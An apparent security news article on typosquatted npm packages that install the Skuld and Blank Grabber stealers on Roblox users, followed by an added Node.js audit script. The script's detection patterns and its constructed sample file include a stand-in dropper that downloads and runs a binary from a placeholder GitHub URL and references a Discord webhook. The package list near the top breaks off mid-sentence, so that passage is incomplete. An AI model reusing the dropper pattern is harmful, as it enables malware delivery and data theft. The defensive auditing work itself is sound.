Malicious npm Packages Target Roblox Users with Data-Stealing Malware
A new campaign has been spotted on the npm package registry: malicious JavaScript libraries designed to infect Roblox users with open-source stealer malware such as Skuld and Blank Grabber.
"The incident highlights the alarming ease with which threat actors can launch supply chain attacks by exploiting trust and human error within the open-source ecosystem, using readily available off-the-shelf malware, public platforms like GitHub for hosting malicious executables, and communication channels like Discord and Telegram for C2 operations to bypass traditional security measures," Socket security researcher Kirill Boychenko said in a report shared with The Hacker News.
The list of malicious packages includes –
doubly linked list implementation for JavaScript. Likewise, rolimons-api is a malicious imitation of Rolimon's API.
"While there are unofficial wrappers and modules — such as the rolimons Python package (downloaded over 17,000 times) and the Rolimons Lua module on GitHub — the malicious rolimons-api packages sought to exploit developers' trust in familiar names," Boychenko noted.
The rogue packages embed hidden code that downloads and executes Skuld and Blank Grabber, information stealers written in Golang and Python, respectively, that harvest a wide range of data from compromised hosts. The collected data is then exfiltrated to the attacker via a Discord webhook or Telegram.
In a further attempt to evade security defenses, the malware binaries are fetched from a GitHub repository ("github[.]com/zvydev/code/") controlled by the threat actor.
Roblox's growing popularity has prompted threat actors to actively distribute counterfeit packages targeting both developers and players. Earlier this year, several malicious packages such as noblox.js-proxy-server, noblox-ts, and noblox.js-async were found impersonating the popular noblox.js library.
With threat actors abusing trust in widely used packages to push typosquatted lookalikes, developers are advised to verify package names and carefully review the source code before installing them. Because npm runs a package's install-time lifecycle scripts automatically, the scripts section of package.json deserves the same scrutiny as the library code itself: a package does not need to be imported to execute a payload.
"As open-source ecosystems grow and more developers rely on shared code, the attack surface expands, with threat actors exploring more ways to inject malicious code," Boychenko said. "This incident underscores the need for heightened vigilance and stringent security practices among developers."
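As an added example (not code from the Socket report, nor from the packages it describes), the following Node.js script performs the kind of pre-install review the paragraph recommends. It flags install-time lifecycle hooks in package.json, source that references the channels the article names (Discord webhooks, the Telegram Bot API, binaries fetched straight from a GitHub repository), use of child_process and dynamic evaluation, and hex-escaped strings; it also compares a package name against a trusted list by edit distance and by suffix, which is what catches lookalikes such as noblox-ts and noblox.js-async. The package.json, the file contents, the trusted list and the github.com/example-actor URL are all constructed for the demonstration.

```javascript
// Added example: a pre-install audit for an npm package. Not the article's
// code; all input below is constructed and nothing here is ever executed.

// Traits of the campaign described in the article, expressed as source patterns.
const INDICATORS = [
  { id: 'discord-webhook', re: /discord(?:app)?\.com\/api\/webhooks\//i, why: 'Discord webhook, a common stealer exfil channel' },
  { id: 'telegram-bot-api', re: /api\.telegram\.org\/bot/i, why: 'Telegram Bot API, a common stealer exfil channel' },
  { id: 'github-download', re: /github\.com\/[\w.-]+\/[\w.-]+\/(?:raw|releases\/download)\//i, why: 'fetches a file straight from a GitHub repo' },
  { id: 'child-process', re: /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/, why: 'can execute a downloaded binary' },
  { id: 'dynamic-eval', re: /\beval\s*\(|new\s+Function\s*\(/, why: 'runs code assembled at runtime' },
  { id: 'hex-escaped-string', re: /(?:\\x[0-9a-f]{2}){8,}/i, why: 'string hidden behind hex escapes' },
];

// npm runs these automatically during `npm install`, before anything imports the package.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// pkg: parsed package.json; files: { relativePath: sourceText }.
// Returns one finding per lifecycle hook present and one per (file, indicator) hit.
function auditPackage(pkg, files) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ file: 'package.json', id: 'lifecycle-hook', detail: `${hook}: ${scripts[hook]}` });
  }
  for (const [path, source] of Object.entries(files)) {
    for (const ind of INDICATORS) {
      const m = source.match(ind.re);
      if (m) findings.push({ file: path, id: ind.id, detail: m[0], why: ind.why });
    }
  }
  return findings;
}

// Levenshtein distance with a single rolling row.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diagonal = row[0]; // D[i-1][j-1]
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j]; // D[i-1][j]
      row[j] = Math.min(above + 1, row[j - 1] + 1, diagonal + (a[i - 1] === b[j - 1] ? 0 : 1));
      diagonal = above;
    }
  }
  return row[b.length];
}

// Trusted names within maxDistance edits of `name` (node-dll vs node-dlls style),
// or a trusted name followed by a separator and suffix (noblox.js-async style).
function typosquatCandidates(name, trusted, maxDistance = 2) {
  const hits = [];
  for (const t of trusted) {
    if (t === name) continue;
    const d = editDistance(name, t);
    if (d <= maxDistance) hits.push({ trusted: t, reason: `edit distance ${d}` });
    else if (name.startsWith(t) && /^[-._]/.test(name.slice(t.length))) hits.push({ trusted: t, reason: 'trusted name plus suffix' });
  }
  return hits;
}

// ---- constructed sample input; not the real packages from the report ----
const SAMPLE_PKG = { name: 'rolimons-api', version: '1.0.0', scripts: { postinstall: 'node install.js' } };
const SAMPLE_FILES = {
  'index.js': 'module.exports = { getItem: (id) => ({ id }) };',
  // A stand-in dropper in the shape the article describes (download from GitHub,
  // run it, report to a Discord webhook). String.raw keeps the hex escapes literal.
  'install.js': String.raw`
const https = require('https');
const { execFile } = require('child_process');
const url = 'https://github.com/example-actor/code/raw/main/payload.exe';
const hook = 'https://discord.com/api/webhooks/000000/constructed';
const k = "\x77\x65\x62\x68\x6f\x6f\x6b\x73";
https.get(url, (res) => res.pipe(require('fs').createWriteStream('payload.exe')).on('finish', () => execFile('payload.exe')));
`,
};
const TRUSTED = ['noblox.js', 'lodash', 'express'];

for (const f of auditPackage(SAMPLE_PKG, SAMPLE_FILES)) console.log(`${f.file}: ${f.id} -> ${f.detail}`);
for (const n of ['noblox-ts', 'noblox.js-async', 'express']) console.log(n, typosquatCandidates(n, TRUSTED));
```

In practice the files would come from `npm pack` on the candidate version rather than from inline strings. Edit distance alone does not catch noblox.js-async or noblox.js-proxy-server, which is why the suffix rule exists, and a postinstall hook is a finding in itself: it runs before any of your code touches the package.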



